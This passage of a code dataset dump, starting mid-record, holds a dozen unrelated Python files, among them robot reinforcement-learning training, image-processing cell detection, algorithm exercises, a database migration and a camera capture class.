lock.release()\n\n\nfor i in range(10):\n t = threading.Thread(target=func, args=(i, ))\n t.start()\n","sub_path":"进程线程/day33/7.锁local原理.py","file_name":"7.锁local原理.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"307233582","text":"#!/usr/bin/env python\n\nimport numpy as np\n\nfrom ars_lib.ars import ARSAgent, Normalizer, Policy, ParallelWorker\nfrom mini_bullet.minitaur_gym_env import MinitaurBulletEnv\n\nimport torch\nimport os\n\n# Multiprocessing package for python\n# Parallelization improvements based on:\n# https://github.com/bulletphysics/bullet3/blob/master/examples/pybullet/gym/pybullet_envs/ARS/ars.py\nimport multiprocessing as mp\nfrom multiprocessing import Pipe\n\n# Messages for Pipe\n_RESET = 1\n_CLOSE = 2\n_EXPLORE = 3\n\n\ndef main():\n \"\"\" The main() function. 
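Sets up the Minitaur PyBullet environment and an ARS agent, then trains with parallel rollout workers over pipes, periodically saving rewards and model checkpoints. 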
\"\"\"\n\n # Hold mp pipes\n mp.freeze_support()\n\n print(\"STARTING MINITAUR ARS\")\n\n # TRAINING PARAMETERS\n # env_name = \"MinitaurBulletEnv-v0\"\n seed = 0\n max_timesteps = 4e6\n eval_freq = 1e1\n save_model = True\n file_name = \"mini_ars_\"\n\n # Find abs path to this file\n my_path = os.path.abspath(os.path.dirname(__file__))\n results_path = os.path.join(my_path, \"../results\")\n models_path = os.path.join(my_path, \"../models\")\n\n if not os.path.exists(results_path):\n os.makedirs(results_path)\n\n if not os.path.exists(models_path):\n os.makedirs(models_path)\n\n env = MinitaurBulletEnv(render=False)\n\n # Set seeds\n env.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n state_dim = env.observation_space.shape[0]\n print(\"STATE DIM: {}\".format(state_dim))\n action_dim = env.action_space.shape[0]\n print(\"ACTION DIM: {}\".format(action_dim))\n max_action = float(env.action_space.high[0])\n\n print(\"RECORDED MAX ACTION: {}\".format(max_action))\n\n # Initialize Normalizer\n normalizer = Normalizer(state_dim)\n\n # Initialize Policy\n policy = Policy(state_dim, action_dim)\n\n # Initialize Agent with normalizer, policy and gym env\n agent = ARSAgent(normalizer, policy, env)\n agent_num = 0\n if os.path.exists(models_path + \"/\" + file_name + str(agent_num) +\n \"_policy\"):\n print(\"Loading Existing agent\")\n agent.load(models_path + \"/\" + file_name + str(agent_num))\n\n # Evaluate untrained agent and init list for storage\n evaluations = []\n\n env.reset(agent.desired_velocity, agent.desired_rate)\n episode_reward = 0\n episode_timesteps = 0\n episode_num = 0\n\n # MULTIPROCESSING\n\n # Create mp pipes\n num_processes = policy.num_deltas\n processes = []\n childPipes = []\n parentPipes = []\n\n # Store mp pipes\n for pr in range(num_processes):\n parentPipe, childPipe = Pipe()\n parentPipes.append(parentPipe)\n childPipes.append(childPipe)\n\n # Start multiprocessing\n for proc_num in range(num_processes):\n p = mp.Process(target=ParallelWorker, args=(childPipes[proc_num], env))\n p.start()\n processes.append(p)\n\n print(\"STARTED MINITAUR ARS\")\n\n t = 0\n while t < (int(max_timesteps)):\n\n # Maximum timesteps per rollout\n t += policy.episode_steps\n\n episode_timesteps += 1\n\n episode_reward = agent.train_parallel(parentPipes)\n # episode_reward = agent.train()\n # +1 to account for 0 indexing.\n # +0 on ep_timesteps since it will increment +1 even if done=True\n print(\"Total T: {} Episode Num: {} Episode T: {} Reward: {}, >400: {}\".\n format(t, episode_num, policy.episode_steps, episode_reward,\n agent.successes))\n # Reset environment\n evaluations.append(episode_reward)\n episode_reward = 0\n episode_timesteps = 0\n\n # Evaluate episode\n if (episode_num + 1) % eval_freq == 0:\n # evaluate_agent(agent, env_name, seed,\n np.save(results_path + \"/\" + str(file_name), evaluations)\n if save_model:\n agent.save(models_path + \"/\" + str(file_name) +\n str(episode_num))\n # replay_buffer.save(t)\n\n episode_num += 1\n\n # Close pipes and hence envs\n for parentPipe in parentPipes:\n parentPipe.send([_CLOSE, \"pay2\"])\n\n for p in processes:\n p.join()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"spot_bullet/src/old_training_scripts/mini_ars.py","file_name":"mini_ars.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"164005014","text":"\"\"\"empty message\n\nRevision ID: 460ac76c6e10\nRevises: 360364f0db33\nCreate Date: 2018-10-05 
19:54:09.846759\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '460ac76c6e10'\ndown_revision = '360364f0db33'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('common_post',\n    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('title', sa.String(length=200), nullable=False),\n    sa.Column('content', sa.Text(), nullable=False),\n    sa.Column('create_time', sa.DateTime(), nullable=True),\n    sa.Column('board_id', sa.Integer(), nullable=True),\n    sa.Column('user_id', sa.String(length=100), nullable=True),\n    sa.ForeignKeyConstraint(['board_id'], ['bk.id'], ),\n    sa.ForeignKeyConstraint(['user_id'], ['frontuser.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('common_post')\n    # ### end Alembic commands ###\n","sub_path":"pjbbs/migrations/versions/460ac76c6e10_.py","file_name":"460ac76c6e10_.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"392948749","text":"'''Function that computes the total calories in the package,\r\nthe calories in the portion consumed, and\r\nhow many portions the package serves'''\r\ndef calcularKcal(kcalPorGrama, tamanhoPkg, gramas, qtdPorcao):\r\n\tqtdPorcoes = tamanhoPkg / gramas\r\n\ttotalKcal = kcalPorGrama * qtdPorcoes\r\n\tqtdPorcaoConsumida = kcalPorGrama * qtdPorcao\r\n\r\n\tprint(\"Total kcal in the package: %s\" %totalKcal)\r\n\tprint(\"Number of portions in the package: %s\" %qtdPorcoes)\r\n\tprint(\"Kcal of the portion consumed: %s\" %qtdPorcaoConsumida)\r\n\r\n\r\ntamanhoPkg = int(raw_input(\"Enter the package size in grams: \"))\r\ngramas = int(raw_input(\"Enter the grams per portion: \"))\r\nkcalPorGrama = int(raw_input(\"Enter the kcal per gram: \"))\r\nqtdPorcao = int(raw_input(\"Enter the number of portions consumed: \"))\r\n\r\ncalcularKcal(kcalPorGrama, tamanhoPkg, gramas, qtdPorcao)\r\n","sub_path":"calculaKcal.py","file_name":"calculaKcal.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"6289893","text":"import os\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom skimage.filters.rank import median\r\nfrom skimage.morphology import disk\r\nfrom skimage.filters import sobel\r\n\r\nfrom scipy import ndimage\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nRESULTS_DIR = 'results'\r\nSUB_DIRS = ['cell_detection', 'white_detection', 'red_detection', 'processed_data']\r\nCELL_DIRS = ['edge', 'color']\r\n\r\nDEV_MODE = False\r\n\r\n\r\ndef build_dir(dir):\r\n    if not os.path.exists(dir):\r\n        os.makedirs(dir)\r\n\r\ndef create_dirs(sub_name):\r\n    root_path = os.getcwd()\r\n    results_path = os.path.join(root_path, RESULTS_DIR)\r\n    subroot_path = os.path.join(results_path, sub_name)\r\n\r\n    for sub_dir in SUB_DIRS:\r\n        sub_path = os.path.join(subroot_path, sub_dir)\r\n        if sub_dir == 'cell_detection':\r\n            for cell_dir in CELL_DIRS:\r\n                cell_path = os.path.join(sub_path, cell_dir)\r\n                build_dir(cell_path)\r\n        else:\r\n            build_dir(sub_path)\r\n\r\n\r\ndef show_img(img):\r\n    plt.imshow(img, cmap='gray')\r\n    plt.show()\r\n\r\n\r\ndef show_ind_channels(img):\r\n    figure, plots = plt.subplots(ncols=3, nrows=1)\r\n    for i, subplot in zip(range(3), plots):\r\n        temp = img[:, :, i]\r\n        subplot.imshow(temp, cmap='gray')\r\n        subplot.set_axis_off()\r\n    plt.show()\r\n\r\n\r\ndef grayscale_img(alg, img):\r\n\r\n    if alg == 'avg':\r\n        return (img[:,:,0] + img[:,:,1] + img[:,:,2]) / 3\r\n\r\n    if alg == 'luma':\r\n        return 0.3 * img[:, :, 0] + 0.59 * img[:, :, 1] + 0.11 * img[:, :, 2]\r\n\r\n    if alg == 'desat':\r\n        temp = np.maximum(img[:, :, 0], img[:, :, 1])\r\n        a = np.maximum(temp, img[:, :, 2])\r\n        temp = np.minimum(img[:, :, 0], img[:, :, 1])\r\n        b = np.minimum(temp, img[:, :, 2])\r\n        return (a + b) / 2\r\n\r\n    if alg == 'dcmin':\r\n        temp = np.minimum(img[:, :, 0], img[:, :, 1])\r\n        return np.minimum(temp, img[:, :, 2])\r\n\r\n    if alg == 'dcmax':\r\n        temp = np.maximum(img[:, :, 0], img[:, :, 1])\r\n        return np.maximum(temp, img[:, :, 2])\r\n\r\n    if alg == 'red':\r\n        return img[:, :, 0]\r\n\r\n    if alg == 'green':\r\n        return img[:, :, 1]\r\n\r\n    if alg == 'blue':\r\n        return img[:, :, 2]\r\n\r\n\r\ndef invert_img(img):\r\n    return 255 - img\r\n\r\n\r\ndef impose_img(lines, pic):\r\n    out = pic.copy()\r\n    out[lines > 0.5] = [255,255,255,0]\r\n    return out\r\n\r\n\r\ndef apply_threshold(img, thresh):\r\n    t_value = thresh/100 * 255\r\n    img[img < t_value] = 0\r\n    img[img >= t_value] = 255\r\n    return img\r\n\r\n\r\ndef apply_smoothing(img):\r\n    return median(img, disk(5))\r\n\r\n\r\ndef apply_filler(img):\r\n    return ndimage.binary_fill_holes(img, structure=np.ones((15,15)))\r\n\r\n\r\ndef normalize(img):\r\n    return img/255\r\n\r\n\r\ndef conv2uint8(img):\r\n    return np.array(img, dtype=\"uint8\") * 250\r\n\r\n\r\nclass ImgProcessor:\r\n\r\n    def __init__(self, sub_name, gray_scale_mode='dcmax', save_mode=True):\r\n        root_path = os.getcwd()\r\n        results_path = os.path.join(root_path, RESULTS_DIR)\r\n        self.subroot_path = os.path.join(results_path, sub_name)\r\n        self.gray_mode = gray_scale_mode\r\n        self.save = save_mode\r\n\r\n    def save_img(self, sub_dir, file_name, img):\r\n        output_file = os.path.join(self.subroot_path, *sub_dir)\r\n        output_file = os.path.join(output_file, file_name)\r\n\r\n        cv2.imwrite(output_file, img)\r\n\r\n    def detect_red_vessels(self, org_img, name, bgr_base, threshold):\r\n\r\n        lower = np.array([max(0, x - threshold) for x in bgr_base], dtype=\"uint8\")\r\n        upper = np.array([min(255, x + threshold) for x in bgr_base], dtype=\"uint8\")\r\n\r\n        mask = cv2.inRange(org_img, lower, upper)\r\n        img_masked = cv2.bitwise_and(org_img, org_img, mask=mask)\r\n\r\n        img_gray = grayscale_img(self.gray_mode, img_masked)\r\n        img_smooth = apply_smoothing(img_gray)\r\n\r\n        if self.save:\r\n            # save under results/<sub_name>/red_detection, following the same convention as the other detectors\r\n            sub_dir = ['red_detection']\r\n            post_fix = 'red_th-{}'.format(threshold)\r\n            file_name, file_type = os.path.splitext(name)\r\n            output_name = '{}_{}{}'.format(file_name, post_fix, file_type)\r\n            self.save_img(sub_dir, output_name, img_smooth*255)\r\n\r\n        return normalize(img_smooth)\r\n\r\n    def detect_white_matter(self, org_img, name, red_scale, green_scale, blue_scale, threshold=100):\r\n        t_value = threshold/100*255\r\n\r\n        f_img = org_img\r\n        org_img[red_scale < t_value] = [0, 0, 0]\r\n        org_img[green_scale < t_value] = [0, 0, 0]\r\n        org_img[blue_scale < t_value] = [0, 0, 0]\r\n\r\n        org_img[red_scale >= t_value] = [255, 255, 255]\r\n        org_img[green_scale >= t_value] = [255, 255, 255]\r\n        org_img[blue_scale >= t_value] = [255, 255, 255]\r\n\r\n        img_gray = grayscale_img(self.gray_mode, f_img)\r\n        img_inv = invert_img(img_gray)\r\n        img_filled = apply_filler(img_inv)\r\n        img_smooth = apply_smoothing(img_filled)\r\n        img_fill = apply_filler(img_smooth)\r\n        img_proc = invert_img(img_fill*255)\r\n\r\n        if DEV_MODE:\r\n            
show_img(img_fill)\r\n\r\n if self.save:\r\n sub_dir = ['white_detection']\r\n file_name, file_type = os.path.splitext(name)\r\n post_fix = 'white_th-{}'.format(threshold)\r\n output_name = '{}_{}{}'.format(file_name, post_fix, file_type)\r\n self.save_img(sub_dir, output_name, img_proc)\r\n\r\n return normalize(img_proc)\r\n\r\n def cell_detection(self, org_img, name, mode=0, threshold=100, boundaries=None):\r\n\r\n sub_dir = ['cell_detection']\r\n post_fix = 'cell_'\r\n if mode == 1:\r\n lower = boundaries[0]\r\n upper = boundaries[1]\r\n mask = cv2.inRange(org_img, np.array(lower, dtype=\"uint8\"), np.array(upper, dtype=\"uint8\"))\r\n img = cv2.bitwise_and(org_img, org_img, mask=mask)\r\n sub_dir.append('color')\r\n post_fix += 'color_(lb-{}_ub{}-)'.format(','.join(str(x) for x in lower),\r\n ','.join(str(x) for x in upper))\r\n else:\r\n img = org_img\r\n sub_dir.append('edge')\r\n post_fix += 'edge_th-{}'.format(threshold)\r\n\r\n img_gray = grayscale_img(self.gray_mode, img)\r\n\r\n img_inv = invert_img(img_gray)\r\n\r\n img_thresh = apply_threshold(img_inv, threshold)\r\n img_smooth = apply_smoothing(img_thresh)\r\n img_filled = apply_filler(img_smooth)\r\n img_proc = conv2uint8(img_filled)\r\n img_edges = sobel(img_filled)\r\n\r\n if mode == 1:\r\n img_proc = invert_img(img_proc)\r\n\r\n _, contours, _ = cv2.findContours(img_proc, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n if DEV_MODE:\r\n show_img(img_gray)\r\n show_img(img_proc)\r\n show_img(img_edges)\r\n\r\n if self.save:\r\n file_name, file_type = os.path.splitext(name)\r\n output_name = '{}_{}{}'.format(file_name, post_fix, file_type)\r\n self.save_img(sub_dir, output_name, img_edges*255)\r\n\r\n return normalize(img_proc), len(contours)\r\n\r\n\r\ndef test_util():\r\n create_dirs('test')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n test_util()","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250392223","text":"#\n# @lc app=leetcode id=15 lang=python3\n#\n# [15] 3Sum\n#\nclass Solution:\n # Time Limit Eceeeded\n # def twoSum(self, nums: List[int], sum_: int) -> List[List[int]]:\n # map = {}\n # result = []\n # for i in range(len(nums)):\n # if sum_ - nums[i] not in map:\n # map[sum_ - nums[i]] = i\n # for i in range(len(nums)):\n # if nums[i] in map and i != map[nums[i]]:\n # pair = sorted([nums[i], nums[map[nums[i]]]])\n # if pair not in result:\n # result.append(pair)\n # return result\n \n # def threeSum(self, nums: List[int]) -> List[List[int]]:\n # result = []\n # for i in range(len(nums)):\n # temp = nums.copy()\n # _ = temp.pop(i)\n # i_pair = self.twoSum(temp, - nums[i])\n # for p in i_pair:\n # pair = sorted([nums[i]] + p)\n # if pair not in result:\n # result.append(pair)\n # return result\n\n # Time Limit Exceeded\n # def threeSum(self, nums: List[int]) -> List[List[int]]:\n # result = []\n # nums = sorted(nums)\n # for i in range(len(nums)):\n # j = i + 1\n # k = len(nums) - 1\n # while (j < k):\n # if nums[j] + nums[k] == -nums[i]:\n # pair = [nums[i], nums[j], nums[k]]\n # if pair not in result:\n # result.append(pair)\n # j += 1\n # k -= 1\n # elif nums[j] + nums[k] < -nums[i]:\n # j += 1\n # else:\n # k -= 1\n # return result\n\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n result = []\n nums = sorted(nums)\n for i in range(len(nums)-2):\n if i > 0 and nums[i] == nums[i - 1]:\n continue\n j, k = i + 1, len(nums) - 1\n while j < k:\n s = nums[i] + nums[j] 
+ nums[k]\n if s < 0:\n while j < k and nums[j] == nums[j + 1]:\n j += 1\n j += 1\n elif s > 0:\n while j < k and nums[k] == nums[k - 1]:\n k -= 1\n k -= 1\n else:\n result.append([nums[i], nums[j], nums[k]])\n while j < k and nums[j] == nums[j + 1]:\n j += 1\n while j < k and nums[k] == nums[k - 1]:\n k -= 1\n j += 1\n k -= 1\n return result\n","sub_path":"15.3-sum.py","file_name":"15.3-sum.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"529062627","text":"'''\n\t@judge UVa\n\t@id 574\n\t@name Sum It Up\n\n\t@tag Subset Sum\n'''\nfrom sys import stdin\nfrom itertools import chain, dropwhile\n\ndef answer(arr, t):\n\tif t == 0:\n\t\treturn [[]]\n\tif t < 0 or len(arr) == 0:\n\t\treturn []\n\tcnt = arr.count(arr[0])\n\tbrr = list(dropwhile(lambda x: x == arr[0], arr))\n\ts = [ [ arr[0] ] * x + ls for x in range(cnt, -1, -1) for ls in answer(brr, t - x * arr[0]) ]\n\treturn s\n\ndef solve(arr, t):\n\ts = answer(arr, t)\n\tif len(s) == 0:\n\t\treturn 'NONE'\n\treturn '\\n'.join(map(lambda ls: '+'.join(map(str, ls)), s))\n\nfor line in stdin:\n\tt, n, *arr = map(int, line.split())\n\tif n == 0:\n\t\tbreak\n\tprint(f'Sums of {t}:')\n\tprint(solve(arr, t))","sub_path":"since2020/UVa/UVa 574.py","file_name":"UVa 574.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568764659","text":"# Copyright 2019 Nokia\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nclass HTTPRPC(object):\n def __init__(self):\n self.req_body = ''\n self.req_filter = ''\n self.req_params = {}\n self.req_method = ''\n self.rep_body = ''\n self.rep_status = ''\n\n def __str__(self):\n return str.format('REQ: body:{body} filter:{filter} '\n 'params:{params} method:{method} '\n 'REP: body:{rep_body} status:{status}',\n body=self.req_body, filter=self.req_filter,\n params=str(self.req_params), method=self.req_method,\n rep_body=self.rep_body, status=self.rep_status)\n","sub_path":"cmframework/src/cmframework/server/cmhttprpc.py","file_name":"cmhttprpc.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392255370","text":"# Let us say that a list A is *sorted* if its elements are stored\n#in the ascending order. For instance, A=[1,3,3,4,8,12] is sorted\n#while A=[8,10,1,14,16] is not because 10>1. 
\n#Please write a program whose input is a list A and whose output\n#is `sorted' if A is sorted and `not sorted' otherwise.\n\n\nnumber = int (input('how many elements would you like to enter in your list'))\n\nmyList=[]\nfor i in range (0, number):\n element=int(input('enter a number'))\n myList.append(element)\n\n\nsortedL =1\nfor i in range(len(myList)-1):\n if(myList[i] > myList[i +1]):\n sortedL = 0\n break\nif(sortedL == 0):\n print('The list is not sorted')\nelse:\n print('The list is sorted')\n \n\n","sub_path":"Python lists/python lists5.py","file_name":"python lists5.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85093768","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 14 20:09:12 2018\nInput: \t\n\n1 2 3\n4 5 6\n7 8 9\n\nReturn the following :\n\n[ \n [1],\n [2, 4],\n [3, 5, 7],\n [6, 8],\n [9]\n]\n@author: anu\nAccepted ** \n\"\"\"\n\nclass Solution:\n # @param A : list of list of integers\n # @return a list of list of integers\n def diagonal(self, A):\n res=[]\n n=len(A[0])\n \n for i in range(n):\n L=[]\n k=i \n for j in range(i+1): \n L.append(A[j][k])\n k-=1\n print(L)\n res.append(L)\n for i in range(1,n):\n L=[]\n k=n-1 \n for j in range(i,n): \n L.append(A[j][k])\n k-=1\n print(L)\n res.append(L) \n\n return res\n \n \ns=Solution()\nprint(s.diagonal([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]))\n","sub_path":"array/antiDiagonals.py","file_name":"antiDiagonals.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"306084648","text":"import numpy as np\nfrom scipy.signal import correlate2d\n#import itk\nfrom skimage import io\n#from itkwidgets import view\n#import itkwidgets\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom os.path import isfile , join\nfrom PIL import Image\n#from cvutils import rgb2gray\n#import cv2\nfrom skimage.color import rgb2gray\nimport Feature_ext\nimport importlib\nimportlib.reload(Feature_ext)\n\n\ndef match_template_corr( x , temp ):\n y = np.empty(x.shape)\n y = correlate2d(x,temp,'same')\n return y \n\n#______Method 1: Direct 2D correlation of the image with the zero-mean template\n\ndef match_template_corr_zmean( x , temp ):\n return match_template_corr(x , temp - temp.mean())\n\n\ndef image():\n imgs_dir1 = 'images'\n imgs_names1 = ['chess.jpg']\n imgs_fnames1 = [ join( imgs_dir1, img_name1) for img_name1 in imgs_names1 ]\n imgs_rgb1 = [ np.array(Image.open(img1)) for img1 in imgs_fnames1 ]\n imgs_gray = [ rgb2gray( img1 ) for img1 in imgs_rgb1 ]\n \n imgs_dir = 'images'\n imgs_names = ['chess_templete.jpg']\n imgs_fnames = [ join( imgs_dir, img_name) for img_name in imgs_names ]\n imgs_rgb = [ np.array(Image.open(img)) for img in imgs_fnames ]\n Templete_gray = [ rgb2gray( img ) for img in imgs_rgb ]\n \n matches_corr_zmean = [ match_template_corr_zmean(x,h) for (x,h) in zip(imgs_gray,Templete_gray)]\n \n matches_corr_zmean_maxima = [ Feature_ext.Get_Maximum(x,min(t.shape)//8) for (x,t) in zip(matches_corr_zmean,Templete_gray)]\n \n\n\n\n patches = zip(imgs_gray,Templete_gray,\n matches_corr_zmean\n ,matches_corr_zmean_maxima)\n\n return patches\n\ndef method1_func(patches):\n for i,(im,temp,mcorrz,pcorrz) in enumerate(patches):\n def get_rect_on_maximum(y,template):\n ij = np.unravel_index(np.argmax(y), y.shape)\n x, y = ij[::-1]\n # highlight matched region\n htemp, wtemp = 
template.shape\n rect = plt.Rectangle((x-wtemp/2, y-htemp/2), wtemp, htemp, edgecolor='r', facecolor='none')\n return rect,x,y\n \n def make_rects(plt_object,xy,template):\n htemp, wtemp = template.shape\n for ridx in range(xy.shape[0]):\n y,x = xy[ridx]\n r = plt.Rectangle((x-wtemp/2, y-htemp/2), wtemp, htemp, edgecolor='g', facecolor='none')\n plt_object.add_patch(r)\n \n def make_circles(plt_object,xy,template):\n htemp, wtemp = template.shape\n for ridx in range(xy.shape[0]):\n y,x = xy[ridx]\n plt_object.plot(x, y, 'o', markeredgecolor='g', markerfacecolor='none', markersize=20)\n \n \n \n ##########Display Image \n \n r,x,y = get_rect_on_maximum(mcorrz,temp)#####get maximum to put rects\n #______________________show matching space_____________________ \n fig1, ax1 = plt.subplots(figsize = (5, 10))\n plt.autoscale(True)\n \n ax1.imshow(mcorrz, cmap=plt.get_cmap('gray'))\n matching_space_image=make_circles(ax1, pcorrz,temp)####put circles on image\n ax1.plot(x, y, 'o', markeredgecolor='r', markerfacecolor='none', markersize=20)\n \n plt.gca().set_axis_off()\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.savefig('matching_space.jpg', dpi=900, bbox_inches='tight',pad_inches=0)\n plt.show(matching_space_image) \n \n \n \n #_______________________show detected patterns___________________-\n fig2, ax2 = plt.subplots(figsize = (5, 10))\n plt.autoscale(True) \n \n ax2.imshow(im, cmap=plt.get_cmap('gray'))\n make_rects( ax2 , pcorrz, temp )\n detected_patterns_image=ax2.add_patch(r) ####put rects on image\n plt.gca().set_axis_off()\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.savefig('template_matching.jpg', dpi=900, bbox_inches='tight',pad_inches=0)\n plt.show(detected_patterns_image) \n \n\n#patches=image()\n#method1_func(patches)","sub_path":"Matching_Methods/method1.py","file_name":"method1.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"54548253","text":"import logging\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)-8s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='spam.log',\n filemode='w')\n\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n\nlogger = logging.getLogger('simple_example2')\nlogger.addHandler(ch)\n\nlogger.debug('debug message')\nlogger.info('info message')\nlogger.warn('warn message')\nlogger.error('error message')\nlogger.critical('critical message')\n","sub_path":"python_logging/logging_example2.py","file_name":"logging_example2.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605322985","text":"#!/usr/bin/env python3\n# encoding:utf-8\nimport sys\nimport cv2\nimport time\nimport threading\nimport numpy as np\n\nif sys.version_info.major == 2:\n print('Please run this program with python3!')\n sys.exit(0)\n\nclass Camera:\n def __init__(self, resolution=(640, 480)):\n self.cap = None\n self.width = resolution[0]\n self.height = resolution[1]\n self.frame = None\n self.opened = False\n \n self.th = threading.Thread(target=self.camera_task, args=(), daemon=True)\n self.th.start()\n\n def camera_open(self):\n try:\n self.cap = cv2.VideoCapture(-1)\n self.cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('Y', 'U', 'Y', 'V'))\n self.cap.set(cv2.CAP_PROP_FPS, 30)\n 
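# note: the YUYV fourcc, 30 fps and saturation 40 below are tuning values for the original author's camera; adjust per device\n            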
self.cap.set(cv2.CAP_PROP_SATURATION, 40)\n            self.opened = True\n        except Exception as e:\n            print('Failed to open camera:', e)\n\n    def camera_close(self):\n        try:\n            self.opened = False\n            time.sleep(0.2)\n            if self.cap is not None:\n                self.cap.release()\n                time.sleep(0.05)\n            self.cap = None\n        except Exception as e:\n            print('Failed to close camera:', e)\n\n    def camera_task(self):\n        while True:\n            try:\n                if self.opened and self.cap.isOpened():\n                    ret, frame_tmp = self.cap.read()\n                    if ret:\n                        self.frame = cv2.resize(frame_tmp, (self.width, self.height), interpolation=cv2.INTER_NEAREST)\n                        ret = False\n                    else:\n                        self.frame = None\n                        self.cap.release()\n                        cap = cv2.VideoCapture(-1)\n                        ret, _ = cap.read()\n                        if ret:\n                            self.cap = cap\n                elif self.opened:\n                    self.cap.release()\n                    cap = cv2.VideoCapture(-1)\n                    ret, _ = cap.read()\n                    if ret:\n                        self.cap = cap\n                else:\n                    time.sleep(0.01)\n            except Exception as e:\n                print('Error reading camera frame:', e)\n                time.sleep(0.01)\n\nif __name__ == '__main__':\n    my_camera = Camera()\n    my_camera.camera_open()\n    print('Raw camera feed, no distortion correction applied')\n    while True:\n        img = my_camera.frame\n        if img is not None:\n            cv2.imshow('img', img)\n            key = cv2.waitKey(1)\n            if key == 27:\n                break\n    my_camera.camera_close()\n    cv2.destroyAllWindows()\n","sub_path":"src/SpiderPi/Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"606106147","text":"\n\nfrom xai.brain.wordbase.nouns._fastening import _FASTENING\n\n# class header\nclass _FASTENINGS(_FASTENING, ):\n\tdef __init__(self,): \n\t\t_FASTENING.__init__(self)\n\t\tself.name = \"FASTENINGS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fastening\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fastenings.py","file_name":"_fastenings.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"155043623","text":"import pymysql\n\ndb = pymysql.connect(\n    host=\"localhost\",\n    port=8889,\n    user=\"testuser\",\n    password=\"test123\",\n    db=\"personas\")\n\ncursor = db.cursor()\ncursor.execute(\"DROP TABLE IF EXISTS PESO\")\n\nsql = \"\"\"CREATE TABLE PESO (\n    idPersona INT NOT NULL,\n    fecha DATE NOT NULL,\n    peso INT,\n\n    PRIMARY KEY (idPersona, fecha),\n    FOREIGN KEY (idPersona) REFERENCES PERSONA(idPersona)\n\n    )\"\"\"\n\ntry:\n    cursor.execute(sql)\n    db.commit()\nexcept Exception:\n    db.rollback()\n","sub_path":"practico-03/ejercicio-07.py","file_name":"ejercicio-07.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
